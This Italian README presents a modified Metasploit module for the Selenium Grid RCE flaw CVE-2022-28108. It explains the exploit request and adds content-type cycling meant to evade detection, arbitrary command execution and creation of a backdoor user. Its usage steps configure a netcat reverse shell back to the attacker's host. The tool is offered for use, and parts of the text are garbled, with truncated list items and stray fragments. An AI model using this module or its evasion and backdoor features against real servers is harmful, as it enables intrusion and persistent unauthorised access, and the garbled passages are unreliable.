
Modulo Metasploit modificato che sfrutta CVE-2022-28108 (Selenium Grid RCE) con evasione del content-type e funzioni post-sfruttamento per esecuzione comandi e creazione utente backdoor.
Questo repository contiene una versione modificata di un modulo Metasploit che sfrutta una vulnerabilità di esecuzione remota di codice in versioni precedenti di Selenium Server (Grid).
Si prega di leggere attentamente questo README prima di utilizzare questo codice.
Riconoscimento del Codice Originale:
Questo modulo si basa sull'eccellente lavoro degli autori originali del modulo Metasploit per CVE-2022-28108. La funzionalità principale dello sfruttamento della vulnerabilità di Selenium Server rimane in gran parte basata sulla loro implementazione. Riconosciamo e apprezziamo il loro contributo alla comunità della sicurezza.
'Author'). Si prega di fare riferimento al modulo originale per i loro nomi specifici.Vulnerabilità Sfruttata:
Questo modulo prende di mira CVE-2022-28108, una vulnerabilità di Cross-Site Request Forgery (CSRF) in Selenium Server (Grid) precedente alla versione 4.0.0-alpha-7. Questa vulnerabilità sorge perché il server consente tipi di contenuto non JSON (come text/plain, application/x-www-form-urlencoded e multipart/form-data) per determinate richieste. Un attaccante può sfruttare questo per inviare richieste malevole, portando all'esecuzione remota di codice (RCE) sul server.
Come Funziona il Codice Originale:
Il modulo Metasploit originale sfrutta questa vulnerabilità inviando una richiesta POST costruita ad hoc all'endpoint /wd/hub/session del Selenium Server vulnerabile. Questa richiesta utilizza un Content-Type non JSON (in particolare text/plain) e include configurazioni malevole all'interno di goog:chromeOptions delle capacità del browser desiderate. Questo permette a un attaccante di specificare un binario arbitrario (come /usr/bin/python3) e argomenti da eseguire sul server quando viene avviata una nuova sessione del browser.
Modifiche e Miglioramenti in Questa Versione:
Questo repository contiene una versione modificata del modulo Metasploit originale. Le modifiche principali includono:
Content-Type. Questo include text/plain, application/x-www-form-urlencoded e multipart/form-data. Ciò viene fatto per potenzialmente bypassare meccanismi di filtraggio o rilevamento di base che potrebbero cercare un Content-Type specifico.execute_post_exploitation: È stata aggiunta una nuova funzione execute_post_exploitation(session_response). Questa funzione viene chiamata dopo lo sfruttamento riuscito e mira a eseguire attività di post-sfruttamento di base. Nell'implementazione attuale, include:
execute_command_on_target: È stata aggiunta un'altra nuova funzione execute_command_on_target(command). Questa funzione permette l'esecuzione di comandi arbitrari sul sistema di destinazione dopo uno sfruttamento riuscito. Viene utilizzata all'interno della funzione execute_post_exploitation e può essere estesa per ulteriori attività di post-sfruttamento.Differenze Chiave Evidenziate:
La differenza principale risiede nel metodo exploit e nell'aggiunta delle due nuove funzioni.
exploit Originale: Focalizzato sull'invio di una singola richiesta con Content-Type: text/plain.exploit Modificato: Itera attraverso diversi valori Content-Type, tentando lo sfruttamento con ciascuno. In caso di sfruttamento riuscito, chiama la funzione execute_post_exploitation.execute_post_exploitation e execute_command_on_target sono interamente nuove aggiunte a questa versione modificata, fornendo capacità estese di post-sfruttamento.Come Usare il Modulo Modificato:
.rb (es. selenium_rce_extended.rb)./usr/share/metasploit-framework/modules/exploits/ o ~/.msf4/modules/exploits/. Fai riferimento alla tua installazione di Metasploit per la posizione esatta.msfconsole.use exploit/selenium_rce_extended (o il percorso in cui hai salvato il file se lo hai inserito in una sottodirectory).msf6 exploit(selenium_rce_extended) > set RHOSTS <ip_target>
msf6 exploit(selenium_rce_extended) > set RPORT <porta_target>
msf6 exploit(selenium_rce_extended) > set PAYLOAD cmd/unix/reverse_netcat
msf6 exploit(selenium_rce_extended) > set LHOST <tuo_ip>
msf6 exploit(selenium_rce_extended) > set LPORT <tua_porta>
Considerazioni Importanti (Avvertenze):
Esclusione di Responsabilità:
L'autore/ gli autori di questo codice modificato non sono responsabili per qualsiasi uso improprio o danno causato dall'utilizzo di questo modulo. Utilizzando questo codice, accetti di assumerti la piena responsabilità delle tue azioni.
Licenza:
Questo codice modificato è probabilmente coperto dalla stessa licenza del Metasploit Framework originale (tipicamente la MSF License). Si prega di fare riferimento alla licenza originale del Metasploit Framework per i dettagli.
Contributi:
Contributi e miglioramenti a questo modulo sono benvenuti. Sentiti libero di inviare pull request con correzioni di bug, miglioramenti o nuove funzionalità.
Ringraziamenti:
Ribadiamo la nostra gratitudine agli autori originali del modulo Metasploit per CVE-2022-28108. Il loro lavoro costituisce la base di questo modulo modificato.
exploit.